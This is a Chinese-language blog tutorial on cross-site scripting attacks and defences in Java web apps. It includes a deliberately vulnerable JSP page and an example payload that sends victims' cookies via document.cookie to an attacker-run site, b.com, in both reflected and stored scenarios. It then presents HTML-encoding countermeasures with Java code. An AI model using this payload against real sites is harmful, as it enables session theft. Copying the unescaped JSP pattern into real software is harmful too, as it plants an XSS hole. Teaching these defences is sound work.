XSS攻擊及防禦

 

XSS攻擊及防禦

標籤： XSS跨站攻擊腳本攻擊

2013-11-29 18:35 49083人閱讀 評論(11) 收藏 舉報

 分類：

 

Java Web（11） 

版權聲明：本文爲博主原創文章，轉載請註明出處http://blog.csdn.net/ghsau。

目錄(?)[+]

       本文來自：高爽|Coder，原文地址：http://blog.csdn.net/ghsau/article/details/17027893，轉載請註明。
       XSS又稱CSS，全稱Cross SiteScript，跨站腳本攻擊，是Web程序中常見的漏洞，XSS屬於被動式且用於客戶端的攻擊方式，所以容易被忽略其危害性。其原理是攻擊者向有XSS漏洞的網站中輸入(傳入)惡意的HTML代碼，當其它用戶瀏覽該網站時，這段HTML代碼會自動執行，從而達到攻擊的目的。如，盜取用戶Cookie、破壞頁面結構、重定向到其它網站等。

XSS攻擊

       XSS攻擊類似於SQL注入攻擊，攻擊之前，我們先找到一個存在XSS漏洞的網站，XSS漏洞分爲兩種，一種是DOM Based XSS漏洞，另一種是Stored XSS漏洞。理論上，所有可輸入的地方沒有對輸入數據進行處理的話，都會存在XSS漏洞，漏洞的危害取決於攻擊代碼的威力，攻擊代碼也不侷限於script。

DOM Based XSS

       DOM Based XSS是一種基於網頁DOM結構的攻擊，該攻擊特點是中招的人是少數人。

       場景一：

       當我登錄a.com後，我發現它的頁面某些內容是根據url中的一個叫content參數直接顯示的，猜測它測頁面處理可能是這樣，其它語言類似： 

<%@ page language="java"contentType="text/html; charset=UTF-8"pageEncoding="UTF-8"%>

<!DOCTYPEhtmlPUBLIC"-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/loose.dtd">

<html>

    <head>

       <title>XSS測試</title>

    </head>

    <body>

       頁面內容：<%=request.getParameter("content")%>

    </body>

</html>

      我知道了Tom也註冊了該網站，並且知道了他的郵箱(或者其它能接收信息的聯繫方式)，我做一個超鏈接發給他，超鏈接地址爲：http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>，當Tom點擊這個鏈接的時候(假設他已經登錄a.com)，瀏覽器就會直接打開b.com，並且把Tom在a.com中的cookie信息發送到b.com，b.com是我搭建的網站，當我的網站接收到該信息時，我就盜取了Tom在a.com的cookie信息，cookie信息中可能存有登錄密碼，攻擊成功！這個過程中，受害者只有Tom自己。那當我在瀏覽器輸入a.com?content=<script>alert(“xss”)</script>，瀏覽器展示頁面內容的過程中，就會執行我的腳本，頁面輸出xss字樣，這是攻擊了我自己，那我如何攻擊別人並且獲利呢？

Stored XSS

       Stored XSS是存儲式XSS漏洞，由於其攻擊代碼已經存儲到服務器上或者數據庫中，所以受害者是很多人。

       場景二：

       a.com可以發文章，我登錄後在a.com中發佈了一篇文章，文章中包含了惡意代碼，<script>window.open(“www.b.com?param=”+document.cookie)</script>，保存文章。這時Tom和Jack看到了我發佈的文章，當在查看我的文章時就都中招了，他們的cookie信息都發送到了我的服務器上，攻擊成功！這個過程中，受害者是多個人。
       Stored XSS漏洞危害性更大，危害面更廣。

XSS防禦

       我們是在一個矛盾的世界中，有矛就有盾。只要我們的代碼中不存在漏洞，攻擊者就無從下手，我們要做一個沒有縫的蛋。XSS防禦有如下方式。

完善的過濾體系

       永遠不相信用戶的輸入。需要對用戶的輸入進行處理，只允許輸入合法的值，其它值一概過濾掉。

Html encode

       假如某些情況下，我們不能對用戶數據進行嚴格的過濾，那我們也需要對標籤進行轉換。

less-than character (<)	&lt;
greater-than character (>)	&gt;
ampersand character (&)	&amp;
double-quote character (")	&quot;
space character( )	&nbsp;
Any ASCII code character whose code is greater-than or equal to 0x80	&#<number>, where <number> is the ASCII character value.

      比如用戶輸入：<script>window.location.href=”http://www.baidu.com”;</script>，保存後最終存儲的會是：&lt;script&gt;window.location.href=&quot;http://www.baidu.com&quot;&lt;/script&gt;在展現時瀏覽器會對這些字符轉換成文本內容顯示，而不是一段可執行的代碼。

其它

       下面提供兩種Html encode的方法。

• 使用Apache的commons-lang.jar

  StringEscapeUtils.escapeHtml(str);// 漢字會轉換成對應的ASCII碼，空格不轉換

• 自己實現轉換，只轉換部分字符

  private static String htmlEncode(char c) {

      switch(c) {

         case '&':

             return"&amp;";

         case '<':

             return"&lt;";

         case '>':

             return"&gt;";

         case '"':

             return"&quot;";

         case ' ':

             return"&nbsp;";

         default:

             return c +"";

      }

  }

   

  /** 對傳入的字符串str進行Html encode轉換 */

  public static String htmlEncode(String str) {

      if(str ==null || str.trim().equals(""))   return str;

      StringBuilder encodeStrBuilder = new StringBuilder();

      for (int i = 0, len = str.length(); i < len; i++) {

         encodeStrBuilder.append(htmlEncode(str.charAt(i)));

      }

      return encodeStrBuilder.toString();

  }

       (完) 

       本文來自：高爽|Coder，原文地址：http://blog.csdn.net/ghsau/article/details/17027893，轉載請註明。